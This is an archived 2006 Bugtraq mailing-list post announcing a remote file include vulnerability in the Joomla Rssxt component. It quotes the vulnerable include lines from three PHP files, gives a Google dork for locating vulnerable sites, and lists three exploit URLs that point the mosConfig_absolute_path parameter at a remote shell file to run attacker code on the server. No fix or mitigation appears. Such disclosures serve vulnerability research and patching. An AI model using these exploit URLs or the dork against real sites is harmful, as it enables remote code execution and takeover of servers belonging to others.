[<prev] [next>] [thread-next>] [month] [year] [list]
Date: 18 Aug 2006 09:46:12 -0000
From: crackers_child@...ersavascilar.com
To: bugtraq@...urityfocus.com
Subject: Joomla Rssxt <= 1.0 Remote File Include Vulnerability
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------
Title : Joomla Rssxt <= 1.0 Remote File Include Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@... crackers_child@...ersavascilar.com
--------------------------------------------------------------------------------
Google Dorks : allinurl:"/com_rssxt/"
------------------------- -------------------------------------------------------
Download : http://mamboxchange.com/frs/shownotes.php?release_id=985
--------------------------------------------------------------------------------
Bug
in pinger.php
require("../../configuration.php");
require("../../classes/mambo.php");
require("../../includes/sef.php");
require("$mosConfig_absolute_path/administrator/components/com_rssxt/class.rssxt.php");
error_reporting(0);
require("../../includes/IXR_Library.inc.php");
---
in RPC.php
require("../../configuration.php");
require("$mosConfig_absolute_path/classes/mambo.php");
require("$mosConfig_absolute_path/includes/sef.php");
require("$mosConfig_absolute_path/administrator/components/com_rssxt/class.rssxt.php");
require("includes/blogger.php");
require("includes/metaweblog.php");
error_reporting(0);
require("$mosConfig_absolute_path/includes/IXR_Library.inc.php");
--
rssxt.php
include($mosConfig_absolute_path."/components/com_rssxt/includes/feedcreator.class.php");
require_once( $mosConfig_absolute_path."/administrator/components/com_rssxt/class.rssxt.php");
--------------------------------------------------------------------------------
Exploit:
http://www.site.com/joomla_path/components/com_rssxt/pinger.php?mosConfig_absolute_path=Shell.txt?
http://www.site.com/joomla_path/components/com_rssxt/RPC.php?mosConfig_absolute_path=Shell.txt?
http://www.site.com/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=Shell.txt?
--------------------------------------------------------------------------------
greets:
All My Friends And SiberSavascilar.Com Members !
--------------------------------------------------------------------------------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
Powered by Openwall GNU/*/Linux -
Powered by OpenVZ